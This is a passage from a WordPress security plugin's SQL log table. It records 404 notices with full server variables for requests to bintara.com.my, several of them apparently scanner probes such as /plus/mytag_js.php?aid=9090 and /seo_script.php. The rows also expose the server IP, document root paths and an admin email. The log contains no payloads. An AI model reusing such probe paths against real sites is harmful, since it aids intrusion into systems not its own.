13:13:57',35672368,37471120,'https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js?ver=1',1,0,'220.181.124.72'),(27937,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/seo_script.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/seo_script.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/seo_script.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaHsoiSAYEzdGA-RUrIg6AAAAcE\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/seo_script.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/seo_script.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaHsoiSAYEzdGA-RUrIg6AAAAcE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"33892\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/seo_script.php\";s:10:\"SCRIPT_URL\";s:15:\"/seo_script.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaHsoiSAYEzdGA-RUrIg6AAAAcE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570892962.5147\";s:12:\"REQUEST_TIME\";s:10:\"1570892962\";}}','notice','2019-10-12 15:09:25','2019-10-12 15:09:23',35483128,37291288,'https://bintara.com.my/seo_script.php',1,0,'193.106.30.99'),(27938,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:152:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5408.400 QQBrowser/10.1.1430.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.137.16.19\";s:11:\"REMOTE_PORT\";s:5:\"43204\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaIXXok2xAl72-AvyeeK9AAAAkg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570903902.3196\";s:12:\"REQUEST_TIME\";s:10:\"1570903902\";}}','notice','2019-10-12 18:11:45','2019-10-12 18:11:43',35424336,37235304,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'178.137.16.19'),(27939,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/author/admin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/author/admin/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaIbwok2xAl72-AvyeeM2QAAAkc\";s:12:\"REDIRECT_URL\";s:14:\"/author/admin/\";s:11:\"REMOTE_ADDR\";s:13:\"45.162.225.82\";s:11:\"REMOTE_PORT\";s:5:\"60298\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:10:\"SCRIPT_URL\";s:14:\"/author/admin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaIbwok2xAl72-AvyeeM2QAAAkc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570905026.4706\";s:12:\"REQUEST_TIME\";s:10:\"1570905026\";}}','notice','2019-10-12 18:30:30','2019-10-12 18:30:26',35412952,37213640,'https://bintara.com.my/author/admin/',1,0,'45.162.225.82'),(27940,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=9090\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=f0bc514820da9f26e3ebde88e6f5a2a0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:49:\"http://bintara.com.my//plus/mytag_js.php?aid=9090\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaIm7My55D9cVEDGHXmlggAAAA8\";s:38:\"REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:47:\"REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaIm7My55D9cVEDGHXmlggAAAA8\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaIm7My55D9cVEDGHXmlggAAAA8\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"112.114.104.134\";s:11:\"REMOTE_PORT\";s:4:\"1802\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaIm7My55D9cVEDGHXmlggAAAA8\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570907884.5106\";s:12:\"REQUEST_TIME\";s:10:\"1570907884\";}}','notice','2019-10-12 19:18:07','2019-10-12 19:18:05',35041808,36835952,'https://bintara.com.my/plus/mytag_js.php?aid=9090',1,0,'112.114.104.134'),(27941,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/plus/mytag_js.php?aid=9090\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dcf1eb78b2fa41bed672129b06782ca6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:49:\"http://bintara.com.my//plus/mytag_js.php?aid=9090\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaIm@Ik2xAl72-AvyeeS@AAAAkM\";s:38:\"REDIRECT_REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:47:\"REDIRECT_REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaIm@Ik2xAl72-AvyeeS@AAAAkM\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaIm@Ik2xAl72-AvyeeS@AAAAkM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"112.114.104.134\";s:11:\"REMOTE_PORT\";s:4:\"3069\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/plus/mytag_js.php\";s:10:\"SCRIPT_URL\";s:18:\"/plus/mytag_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaIm@Ik2xAl72-AvyeeS@AAAAkM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570907896.324\";s:12:\"REQUEST_TIME\";s:10:\"1570907896\";}}','notice','2019-10-12 19:18:18','2019-10-12 19:18:16',35040752,36840264,'https://bintara.com.my/plus/mytag_js.php?aid=9090',1,0,'112.114.104.134'),(27942,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.57\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"158.115.253.230\";s:11:\"REMOTE_PORT\";s:5:\"60113\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaIpkF1Z8dvWoyK@EqPA-gAAAY8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570908560.7764\";s:12:\"REQUEST_TIME\";s:10:\"1570908560\";}}','notice','2019-10-12 19:29:28','2019-10-12 19:29:21',35415568,37221432,'https://bintara.com.my/?page_id=18',1,0,'158.115.253.230'),(27943,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-20/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-20/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-20/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaI0UVpVsBpodkjD2Ra7dQAAAMk\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-20/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.204\";s:11:\"REMOTE_PORT\";s:5:\"10589\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-20/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-20/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaI0UVpVsBpodkjD2Ra7dQAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570911313.3055\";s:12:\"REQUEST_TIME\";s:10:\"1570911313\";}}','notice','2019-10-12 20:15:16','2019-10-12 20:15:13',34319592,36118728,'https://bintara.com.my/toughbook-20/',1,0,'157.55.39.204'),(27944,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.120.51.130\";s:11:\"REMOTE_PORT\";s:5:\"57351\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\